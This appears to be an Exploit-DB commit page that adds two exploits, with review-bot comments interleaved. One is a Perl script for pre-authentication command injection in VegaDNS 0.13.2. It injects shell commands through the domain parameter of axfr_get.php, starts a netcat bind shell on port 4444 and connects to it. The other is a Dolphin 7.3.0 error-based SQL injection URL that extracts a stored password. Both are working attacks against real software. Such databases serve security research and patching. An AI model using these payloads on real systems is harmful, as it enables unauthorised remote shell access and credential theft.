DB: 2016-09-21

2 new exploits

Dolphin 7.3.0 - Error-Based SQL Injection

VegaDNS 0.13.2 - Remote Command Injection
Offensive Security 2016-09-21 05:07:40 +00:00
parent 91fedcad08
commit fdd9fd65e2
3 changed files with 261 additions and 0 deletions


@ -20403,6 +20403,7 @@ id,file,description,date,author,platform,type,port
23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager - sql_id Information Disclosure",2003-09-19,"H Zero Seven",php,webapps,0
23164,platforms/php/webapps/23164.txt,"myPHPNuke 1.8.8 - auth.inc.php SQL Injection",2003-09-20,"Lifo Fifo",php,webapps,0
23165,platforms/windows/dos/23165.txt,"Sun Java 1.x - XML Document Nested Entity Denial of Service",2003-09-22,"Sun Microsystems",windows,dos,0
40403,platforms/php/webapps/40403.txt,"Dolphin 7.3.0 - Error-Based SQL Injection",2016-09-20,"Kacper Szurek",php,webapps,80
23166,platforms/windows/dos/23166.pl,"Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow Vulnerabilities",2003-09-21,"Bahaa Naamneh",windows,dos,0
23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 - Headers Prescan Denial of Service",1998-12-12,marchew,irix,dos,0
23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Elevation",2003-09-22,"Sebastian Krahmer",linux,local,0
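Review bot: the new row `40403,...` is inserted between ids 23165 and 23166, which breaks the id ordering that the surrounding rows follow; move it to the position where a 404xx id belongs rather than into the 2316x block. Also, this row sets the port field to 80 while the companion VegaDNS webapps row in the other hunk uses 0 for the same kind of HTTP target, so pick one convention for both entries.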
@ -21021,6 +21022,7 @@ id,file,description,date,author,platform,type,port
23802,platforms/linux/remote/23802.txt,"Pegasi Web Server 0.2.2 - Arbitrary File Access",2004-03-11,"Donato Ferrante",linux,remote,0
23803,platforms/linux/remote/23803.txt,"Pegasi Web Server 0.2.2 - Error Page Cross-Site Scripting",2004-03-11,"Donato Ferrante",linux,remote,0
23804,platforms/cgi/remote/23804.txt,"cPanel 5/6/7/8/9 - Resetpass Remote Command Execution",2004-03-11,"Arab VieruZ",cgi,remote,0
40402,platforms/php/webapps/40402.pl,"VegaDNS 0.13.2 - Remote Command Injection",2016-09-20,Wireghoul,php,webapps,0
23805,platforms/multiple/dos/23805.txt,"Targem Games Battle Mages 1.0 - Remote Denial of Service",2004-03-11,"Luigi Auriemma",multiple,dos,0
23806,platforms/cgi/webapps/23806.txt,"cPanel 5/6/7/8/9 - dir Parameter Cross-Site Scripting",2004-03-12,Fable,cgi,webapps,0
23807,platforms/cgi/webapps/23807.txt,"cPanel 5/6/7/8/9 - Login Script Remote Command Execution",2004-03-12,"Arab VieruZ",cgi,webapps,0
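Review bot: same ordering problem as the first hunk: `40402,...` lands between 23804 and 23805 in a block of sequential 2380x ids, so it should be placed where its id sorts. Minor consistency point: the author field here is unquoted (`Wireghoul`) while every neighbouring row quotes the author; unquoted is valid CSV for a value without commas, but a uniform style makes the file easier to diff.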


234
platforms/php/webapps/40402.pl Executable file

@ -0,0 +1,234 @@
#!/usr/bin/perl
$izd= qq{
};$vg=qq{
};$b=qq{
___ .___ .______ ._______._____ .___.__ ._______ .____ .___
.___ | |: __|: __ \ : .____/:_ ___\ : | \ : .___ \ | |___ | |
: | /\| || : || \____|| : _/\ | |___| : || : | || | || |
| |/ : || || : \ | / \| / || . || : || : || |/\
| / || || |___\|_.: __/|. __ ||___| | \_. ___/ | || / \
|______/|___||___||___| :/ :/ |. | |___| :/ |. _____/ |______/
: : :/ : :/
: : :
};$g=qq{
To all the people with mad skills who share their knowledge:
TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO,
mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan,
lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil,
laughing_mantis, g0tm1k, nmrc, and many many more....
};$a=qq^
l
VegaDNS is a tinydns administration tool written in PHP to allow easy
administration of DNS records through a web browser.
-- http://www.vegadns.org
The file axfr_get.php allows unauthenticated access and fails to correctly
apply input escaping to all variables that is based on user input. This
allows an attacker to inject shell syntax constructs to take control of the
command execution.
The following code from axfr_get.php shows how the variable $file becomes
tainted trough the $domain variable which is tainted from direct user input.
The application tries to prevent this by escaping the $domain and $hostname
variables, but fails to escape the $file variable.
---------------------------cut---------------------------
* NOTE:
* This functionality ONLY exists outside of the main application
* because tcplient kept dying fatally due to file descriptor 7
* being unavailable, which only occurs AFTER session_start() is
* called.
*
*/
require_once 'src/config.php';
// CHECKS
// Make sure the hostname was given
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
echo "ERROR: no hostname given\n";
exit;
}
// Make sure that some domains were given
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
echo "ERROR: no domain was supplied\n";
exit;
}
$domain = $_REQUEST['domain'];
$hostname = $_REQUEST['hostname'];
$rand = rand();
$file = "/tmp/$domain.$rand";
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
exec($command, $out);
---------------------------end---------------------------
^;
print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n";
print " "."=" x 50 ."[justanotherhacker.com]==\n";
&usage if ($ARGV[0] !~ m!.+://([^/:]+)!);
$h=$1;
print " . . . Locating netcat\n";
$cmd='which+nc';
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -s -k '$t'`;
if ($z !~ m{/nc}) {
print " ! ! ! netcat not found! Manual exploitation required:\n";
print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
exit 1;
}
print " . . . netcat found: $z\n";
print " . . . Performing IZUNA DROP!\n";
# ← · ↑ · → · ↓ · ↖ · ↗ · ↘ · ↙
print " ↓ ↓ ↑ *k* → → *p*\n";
$cmd="$z+-e+/bin/sh+-lp+4444";
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -m 3 -s -k '$t &'`;
print $vg."\n";
print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
system("nc -v $h 4444");
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit;
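Review bot: the advisory header has typos that should be corrected before this ships ("trough" for "through" in the `$file` explanation, "tcplient" for "tcpclient" in the quoted PHP comment), and the root cause stated there is the useful part to keep precise: `escapeshellcmd()` is applied to `$domain` only where it appears as a quoted argument, while `$file = "/tmp/$domain.$rand"` is interpolated into `$command` raw, so the escaping on the argument does nothing for the path; the fix on the application side is to validate `$domain` against a hostname pattern (or pass it through `escapeshellarg()`) before it is used to build `$file`. On the script itself: there is no `use strict; use warnings;`, and `&usage if ($ARGV[0] !~ m!...!)` evaluates the regex against an undefined value when run with no arguments, so the usage path is only reached after an "uninitialized value" warning; test `@ARGV` first. Note also that the rendered hunk ends at `sub usage { ... exit;` without its closing `}` although the header advertises 234 lines, so the excerpt shown here is truncated and the trailing lines are not reviewable from this page.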

platforms/php/webapps/40403.txt Executable file

@ -0,0 +1,25 @@
# Exploit Title: Dolphin 7.3.0 Error Based SQL Injection
# Date: 20-09-2016
# Software Link: https://www.boonex.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
`$_REQUEST['key']` is not escaped inside `actions.inc.php`.
http://security.szurek.pl/dolphin-730-error-based-sql-injection.html
2. Proof of Concept
http://dolphin/flash/XML.php?module=chat&action=RayzSetMembershipSetting&id=1&_t=41920&key=' UNION select 1, exp(~(select*from(SELECT Password FROM profiles WHERE ID=1)x)); -- a
which is rendered as:
Database access error. Description: DOUBLE value is out of range in 'exp(~((select '%password_here%' from dual)))'<?xml version='1.0' encoding='UTF-8'?><ray><result value="Error saving setting." status="failed" /></ray>
3. Solution:
Update to version 7.3.1
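Review bot: the exploit title here ("Dolphin 7.3.0 Error Based SQL Injection") does not match the description recorded in files.csv ("Dolphin 7.3.0 - Error-Based SQL Injection"); align the two so the entry is searchable by either string. The "Software Link" points at the vendor home page rather than the 7.3.1 release or changelog that the "Solution" section refers to; a link to the fix is more useful to a reader triaging this. Style point: the numbered sections run directly into the header comment block and into each other with no blank lines, and the error output on the "which is rendered as:" line is a single unbroken string that would read better as its own quoted block.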